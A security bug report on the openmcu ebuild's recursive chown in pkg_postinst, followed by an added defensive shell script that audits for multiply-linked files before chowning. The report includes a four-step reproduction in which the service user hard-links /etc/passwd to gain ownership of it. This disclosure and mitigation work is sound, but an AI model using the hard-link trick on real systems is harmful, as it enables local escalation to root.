The openmcu ebuild calls "chown -R" on the live root filesystem in pkg_postinst:

  pkg_postinst() {
      einfo "Setting permissions..."
      chown -R openmcu:openmcu "${ROOT}"etc/openmcu
      ...

This can be exploited by the "openmcu" user to gain root if he places a hard link to a root-owned file in one of those directories. The next time the package is upgraded or reinstalled, the "chown -R" will give root's file to the "openmcu" user.

For example,

  1. emerge openmcu
  2. su -s /bin/sh -c 'ln /etc/passwd /etc/openmcu/x' openmcu
  3. emerge openmcu
  4. /etc/passwd is owned by openmcu:openmcu

I'm marking this private, but the package is maintainer-needed, so security@ will need to CC someone appropriate to fix it.
The package has been removed.
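An added example (not part of the bug report or the openmcu ebuild): a pre-flight audit for the hazard reported above, listing multiply-linked files under a directory and refusing the recursive chown when any are found. The function names and the scratch directory layout are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: audit a tree for multiply-linked files before "chown -R".
# Function names are hypothetical; all sample paths are constructed.

# Print every non-directory under $1 whose link count is greater than 1.
# Such an entry may be a second name for a file that lives elsewhere,
# so changing its owner also changes the owner of that other file.
list_multilinked() {
    find "$1" ! -type d -links +1 -print
}

# Run "chown -R OWNER DIR" only when the audit is clean; return 1 otherwise.
# This is check-then-act: whoever can write to DIR can still add a link
# between the audit and the chown, so treat it as a detection aid and not
# as a replacement for avoiding recursive chown on user-writable trees.
guarded_chown() {
    owner=$1
    dir=$2
    hits=$(list_multilinked "$dir")
    if [ -n "$hits" ]; then
        printf 'refusing chown -R %s %s; multiply-linked entries:\n%s\n' \
            "$owner" "$dir" "$hits" >&2
        return 1
    fi
    chown -R "$owner" "$dir"
}

# Constructed demo in a scratch directory; no real system paths are touched.
demo=$(mktemp -d)
mkdir "$demo/outside" "$demo/conf"
echo data > "$demo/outside/target"          # stands in for a file owned elsewhere
ln "$demo/outside/target" "$demo/conf/x"    # second name inside the audited tree
guarded_chown "$(id -u)" "$demo/conf" || echo "audit blocked the chown"
rm -rf "$demo"
```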